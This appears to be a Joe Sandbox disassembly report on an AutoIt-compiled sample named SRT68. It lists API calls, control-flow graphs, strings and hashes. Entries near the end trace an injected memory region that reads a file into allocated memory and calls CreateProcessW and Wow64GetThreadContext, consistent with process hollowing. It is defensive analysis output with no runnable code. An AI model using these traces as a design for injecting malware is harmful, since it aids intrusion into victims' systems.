                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                      • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                      • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                      • Instruction ID: 05663aeea9b0575f46bdb8a5f8ecb068aea0fb94b649693cc358fbd26a8b5c61
                                                                      • Opcode Fuzzy Hash: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                      • Instruction Fuzzy Hash: 9421F4B1D00219AFDB20DFA4E888B9DBBF4FB08780F10411AF990E6294D7BA45448F91

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00FA4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010652F8,?,00FA37AE,?), ref: 00FA4724
                                                                        • Part of subcall function 00FC050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FA7165), ref: 00FC052D
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA71A8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FDE8C8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FDE909
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00FDE947
                                                                      • _wcscat.LIBCMT ref: 00FDE9A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177
                                                                      • Opcode ID: b46c266affbb35b4acf765e6b1694df7a127d7deb8a15dbf82ca9b644b5a61d3
                                                                      • Instruction ID: 45df1a56da4f13fe1dc6e028d76086493f71c4967623c37c0f4fdfc1421b97f0
                                                                      • Opcode Fuzzy Hash: b46c266affbb35b4acf765e6b1694df7a127d7deb8a15dbf82ca9b644b5a61d3
                                                                      • Instruction Fuzzy Hash: 5A7180B15093029EC324EF65EC81D9BBBF8FF89350F40052EF48587264DB7A9949DB92

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
                                                                      • LoadIconW.USER32(00000063), ref: 00FA3A76
                                                                      • LoadIconW.USER32(000000A4), ref: 00FA3A88
                                                                      • LoadIconW.USER32(000000A2), ref: 00FA3A9A
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
                                                                      • RegisterClassExW.USER32(?), ref: 00FA3B16
                                                                        • Part of subcall function 00FA3041: GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                        • Part of subcall function 00FA3041: RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                        • Part of subcall function 00FA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                        • Part of subcall function 00FA3041: InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                        • Part of subcall function 00FA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                        • Part of subcall function 00FA3041: LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                        • Part of subcall function 00FA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                      • Instruction ID: b8c09096c28dac162b98c169cc3723757366c36f233ac24d838e4577b2799c0e
                                                                      • Opcode Fuzzy Hash: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                      • Instruction Fuzzy Hash: FC215AB1D0030AAFEB20DFA4EC09B9D7BB5FB09791F10011AF584A62A5D3BA5640DF94

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 767 fa3633-fa3681 769 fa3683-fa3686 767->769 770 fa36e1-fa36e3 767->770 771 fa3688-fa368f 769->771 772 fa36e7 769->772 770->769 773 fa36e5 770->773 774 fa374b-fa3753 PostQuitMessage 771->774 775 fa3695-fa369a 771->775 777 fdd0cc-fdd0fa call fb1070 call fb1093 772->777 778 fa36ed-fa36f0 772->778 776 fa36ca-fa36d2 DefWindowProcW 773->776 784 fa3711-fa3713 774->784 782 fdd154-fdd168 call 1002527 775->782 783 fa36a0-fa36a2 775->783 785 fa36d8-fa36de 776->785 813 fdd0ff-fdd106 777->813 779 fa36f2-fa36f3 778->779 780 fa3715-fa373c SetTimer RegisterWindowMessageW 778->780 786 fdd06f-fdd072 779->786 787 fa36f9-fa370c KillTimer call fa443a call fa3114 779->787 780->784 789 fa373e-fa3749 CreatePopupMenu 780->789 782->784 806 fdd16e 782->806 790 fa36a8-fa36ad 783->790 791 fa3755-fa3764 call fa44a0 783->791 784->785 799 fdd0a8-fdd0c7 MoveWindow 786->799 800 fdd074-fdd076 786->800 787->784 789->784 795 fdd139-fdd140 790->795 796 fa36b3-fa36b8 790->796 791->784 795->776 802 fdd146-fdd14f call ff7c36 795->802 804 fa36be-fa36c4 796->804 805 fdd124-fdd134 call 1002d36 796->805 799->784 808 fdd078-fdd07b 800->808 809 fdd097-fdd0a3 SetFocus 800->809 802->776 804->776 804->813 805->784 806->776 808->804 814 fdd081-fdd092 call fb1070 808->814 809->784 813->776 818 fdd10c-fdd11f call fa443a call fa434a 813->818 814->784 818->776
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00FA36D2
                                                                      • KillTimer.USER32(?,00000001), ref: 00FA36FC
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA371F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA372A
                                                                      • CreatePopupMenu.USER32 ref: 00FA373E
                                                                      • PostQuitMessage.USER32(00000000), ref: 00FA374D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: beec288486184ddb18241c3528087c9898e8429f42567a9aaa574fff03446639
                                                                      • Instruction ID: 6bf6cb44a1959a89cc0d34a3657a904c0dc956a6f0396eaa024dd629033f5339
                                                                      • Opcode Fuzzy Hash: beec288486184ddb18241c3528087c9898e8429f42567a9aaa574fff03446639
                                                                      • Instruction Fuzzy Hash: BD4158F2604106BBDB346F68DC09F793769FB47390F240119F582D63A5CA6A9E04B761

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                      • API String ID: 1825951767-3513169116
                                                                      • Opcode ID: 899e281442fe9bf416f7589688144174c2202524c08f49eefdeca04841df2e03
                                                                      • Instruction ID: f7414daf0bea960b1e80dcf88118e738fc8301f97e88ecc6a0105c7d80ad31be
                                                                      • Opcode Fuzzy Hash: 899e281442fe9bf416f7589688144174c2202524c08f49eefdeca04841df2e03
                                                                      • Instruction Fuzzy Hash: D2A15FB2D1021E9ADB04EBA4DC91EEEB779FF16350F44042AF415B7191DF785A08EB60

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 942 15b0da8-15b0e56 call 15ae7d8 945 15b0e5d-15b0e83 call 15b1cb8 CreateFileW 942->945 948 15b0e8a-15b0e9a 945->948 949 15b0e85 945->949 954 15b0e9c 948->954 955 15b0ea1-15b0ebb VirtualAlloc 948->955 950 15b0fd5-15b0fd9 949->950 952 15b101b-15b101e 950->952 953 15b0fdb-15b0fdf 950->953 956 15b1021-15b1028 952->956 957 15b0feb-15b0fef 953->957 958 15b0fe1-15b0fe4 953->958 954->950 959 15b0ebd 955->959 960 15b0ec2-15b0ed9 ReadFile 955->960 961 15b102a-15b1035 956->961 962 15b107d-15b1092 956->962 963 15b0fff-15b1003 957->963 964 15b0ff1-15b0ffb 957->964 958->957 959->950 969 15b0edb 960->969 970 15b0ee0-15b0f20 VirtualAlloc 960->970 971 15b1039-15b1045 961->971 972 15b1037 961->972 965 15b10a2-15b10aa 962->965 966 15b1094-15b109f VirtualFree 962->966 967 15b1013 963->967 968 15b1005-15b100f 963->968 964->963 966->965 967->952 968->967 969->950 973 15b0f22 970->973 974 15b0f27-15b0f42 call 15b1f08 970->974 975 15b1059-15b1065 971->975 976 15b1047-15b1057 971->976 972->962 973->950 982 15b0f4d-15b0f57 974->982 979 15b1072-15b1078 975->979 980 15b1067-15b1070 975->980 978 15b107b 976->978 978->956 979->978 980->978 983 15b0f8a-15b0f9e call 15b1d18 982->983 984 15b0f59-15b0f88 call 15b1f08 982->984 990 15b0fa2-15b0fa6 983->990 991 15b0fa0 983->991 984->982 992 15b0fa8-15b0fac CloseHandle 990->992 993 15b0fb2-15b0fb6 990->993 991->950 992->993 994 15b0fb8-15b0fc3 VirtualFree 993->994 995 15b0fc6-15b0fcf 993->995 994->995 995->945 995->950
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015B0E79
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015B109F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction ID: 2dd0b6ae8ad7f26be0850b84585a5321a71460c75a96327eff0ec13096ac2285
                                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction Fuzzy Hash: 7CA11770E00209EBEB14CFA4C898BEEBBB5FF48704F208559E611BB281D7759A81CF54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1073 fa39d5-fa3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: 36388629160e7f414330786b6740770c525ebe7609d1b6b6d0e65fd5a35c3b5d
                                                                      • Instruction ID: b97db4279afa3fcdf3e7f47695c4bf2ce72e7b0e3343b2638be5caca9d9e856c
                                                                      • Opcode Fuzzy Hash: 36388629160e7f414330786b6740770c525ebe7609d1b6b6d0e65fd5a35c3b5d
                                                                      • Instruction Fuzzy Hash: 63F03A706002927EEA305A23AC09E2B2E7DE7CBF90B10001EF940E2168C26A0800DBB0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1074 15b0b88-15b0ca2 call 15ae7d8 call 15b0a78 CreateFileW 1081 15b0ca9-15b0cb9 1074->1081 1082 15b0ca4 1074->1082 1085 15b0cbb 1081->1085 1086 15b0cc0-15b0cda VirtualAlloc 1081->1086 1083 15b0d59-15b0d5e 1082->1083 1085->1083 1087 15b0cde-15b0cf5 ReadFile 1086->1087 1088 15b0cdc 1086->1088 1089 15b0cf9-15b0d33 call 15b0ab8 call 15afa78 1087->1089 1090 15b0cf7 1087->1090 1088->1083 1095 15b0d4f-15b0d57 ExitProcess 1089->1095 1096 15b0d35-15b0d4a call 15b0b08 1089->1096 1090->1083 1095->1083 1096->1095
                                                                      APIs
                                                                        • Part of subcall function 015B0A78: Sleep.KERNELBASE(000001F4), ref: 015B0A89
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015B0C98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: WH55CQ3Z3D38H4XQ8DXCFP2
                                                                      • API String ID: 2694422964-3364051605
                                                                      • Opcode ID: 18f75232e929ab082a27f45747a041d10ec29649587e660822e3e742caee012e
                                                                      • Instruction ID: e89ca1af0eb2298c912a8197dab9dd14758d6cbbf2d002f893370e60e036d7b3
                                                                      • Opcode Fuzzy Hash: 18f75232e929ab082a27f45747a041d10ec29649587e660822e3e742caee012e
                                                                      • Instruction Fuzzy Hash: 43518330D04389DAEF11DBA4C854BEFBBB8AF15304F044599E6487B2C1D7B91B49CBA5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1098 fa407c-fa4092 1099 fa4098-fa40ad call fa7a16 1098->1099 1100 fa416f-fa4173 1098->1100 1103 fdd3c8-fdd3d7 LoadStringW 1099->1103 1104 fa40b3-fa40d3 call fa7bcc 1099->1104 1107 fdd3e2-fdd3fa call fa7b2e call fa6fe3 1103->1107 1104->1107 1108 fa40d9-fa40dd 1104->1108 1116 fa40ed-fa416a call fc2de0 call fa454e call fc2dbc Shell_NotifyIconW call fa5904 1107->1116 1120 fdd400-fdd41e call fa7cab call fa6fe3 call fa7cab 1107->1120 1111 fa40e3-fa40e8 call fa7b2e 1108->1111 1112 fa4174-fa417d call fa8047 1108->1112 1111->1116 1112->1116 1116->1100 1120->1116
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FDD3D7
                                                                        • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                      • _memset.LIBCMT ref: 00FA40FC
                                                                      • _wcscpy.LIBCMT ref: 00FA4150
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3942752672-1585850449
                                                                      • Opcode ID: 6c790eeaa3fa0b13828bb85f6dcc4db6bbd216215ad03ba656b424ac79eb4435
                                                                      • Instruction ID: c019dbc3a5b67a3bae2bb86c2a7c3c463eb41f9564fb8e2f247e9c16f5f56e18
                                                                      • Opcode Fuzzy Hash: 6c790eeaa3fa0b13828bb85f6dcc4db6bbd216215ad03ba656b424ac79eb4435
                                                                      • Instruction Fuzzy Hash: C931D0B1408301AFD331EB60DC46FDB77E8AF86354F14451EF5C582091EBB8A648E792

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1133 fa686a-fa6891 call fa4ddd 1136 fde031-fde041 call 100955b 1133->1136 1137 fa6897-fa68a5 call fa4ddd 1133->1137 1140 fde046-fde048 1136->1140 1137->1136 1142 fa68ab-fa68b1 1137->1142 1143 fde04a-fde04d call fa4e4a 1140->1143 1144 fde067-fde0af call fc0db6 1140->1144 1145 fa68b7-fa68d9 call fa6a8c 1142->1145 1146 fde052-fde061 call 10042f8 1142->1146 1143->1146 1152 fde0d4 1144->1152 1153 fde0b1-fde0bb 1144->1153 1146->1144 1157 fde0d6-fde0e9 1152->1157 1156 fde0cf-fde0d0 1153->1156 1158 fde0bd-fde0cc 1156->1158 1159 fde0d2 1156->1159 1160 fde0ef 1157->1160 1161 fde260-fde263 call fc2d55 1157->1161 1158->1156 1159->1157 1163 fde0f6-fde0f9 call fa7480 1160->1163 1164 fde268-fde271 call fa4e4a 1161->1164 1167 fde0fe-fde120 call fa5db2 call 10073e9 1163->1167 1170 fde273-fde283 call fa7616 call fa5d9b 1164->1170 1177 fde134-fde13e call 10073d3 1167->1177 1178 fde122-fde12f 1167->1178 1186 fde288-fde2b8 call fff7a1 call fc0e2c call fc2d55 call fa4e4a 1170->1186 1184 fde158-fde162 call 10073bd 1177->1184 1185 fde140-fde153 1177->1185 1181 fde227-fde237 call fa750f 1178->1181 1181->1167 1190 fde23d-fde25a call fa735d 1181->1190 1195 fde164-fde171 1184->1195 1196 fde176-fde180 call fa5e2a 1184->1196 1185->1181 1186->1170 1190->1161 1190->1163 1195->1181 1196->1181 1203 fde186-fde19e call fff73d 1196->1203 1208 fde1c1-fde1c4 1203->1208 1209 fde1a0-fde1bf call fa7de1 call fa5904 1203->1209 1210 fde1c6-fde1e1 call fa7de1 call fa6839 call fa5904 1208->1210 1211 fde1f2-fde1f5 1208->1211 1232 fde1e2-fde1f0 call fa5db2 1209->1232 1210->1232 1213 fde215-fde218 call 100737f 1211->1213 1214 fde1f7-fde200 call fff65e 1211->1214 1222 fde21d-fde226 call fc0e2c 1213->1222 1214->1186 1225 fde206-fde210 call fc0e2c 1214->1225 1222->1181 1225->1167 1232->1222
                                                                      APIs
                                                                        • Part of subcall function 00FA4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
                                                                      • _free.LIBCMT ref: 00FDE263
                                                                      • _free.LIBCMT ref: 00FDE2AA
                                                                        • Part of subcall function 00FA6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                      • API String ID: 2861923089-1757145024
                                                                      • Opcode ID: f3b25718a5cadf2398c82f163165d3466a4cd45ebfa9030f42b73a6aa9dc6887
                                                                      • Instruction ID: 82b1d0ce0f7b18c61386dabecfce0eb082517b9650b6a18ff1a6315c0cedef3b
                                                                      • Opcode Fuzzy Hash: f3b25718a5cadf2398c82f163165d3466a4cd45ebfa9030f42b73a6aa9dc6887
                                                                      • Instruction Fuzzy Hash: D9916D71D0021ADFCF04EFA4CC919EDB7B9FF15310F14442AE816AB2A1DB78A915EB50
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FA35A1,SwapMouseButtons,00000004,?), ref: 00FA35D4
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA35F5
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA3617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: c0f27b0c4301a52f23abf08f3cc598f0660fddeb7370ba3043e24a52036023ee
                                                                      • Instruction ID: 160621ada81ecb27178079ce2936f2f70561a4523bee88cf2b2474798c0f2356
                                                                      • Opcode Fuzzy Hash: c0f27b0c4301a52f23abf08f3cc598f0660fddeb7370ba3043e24a52036023ee
                                                                      • Instruction Fuzzy Hash: D8112AB5911218BFDB208FA4D884EAFB7B8EF05750F11455AF805D7310E6719F50AB60
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015B0233
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015B02C9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015B02EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction ID: e109cbe8b58a7df478b8e1845ea4b80f7109439e57edb3379fee62ddf31d6f8f
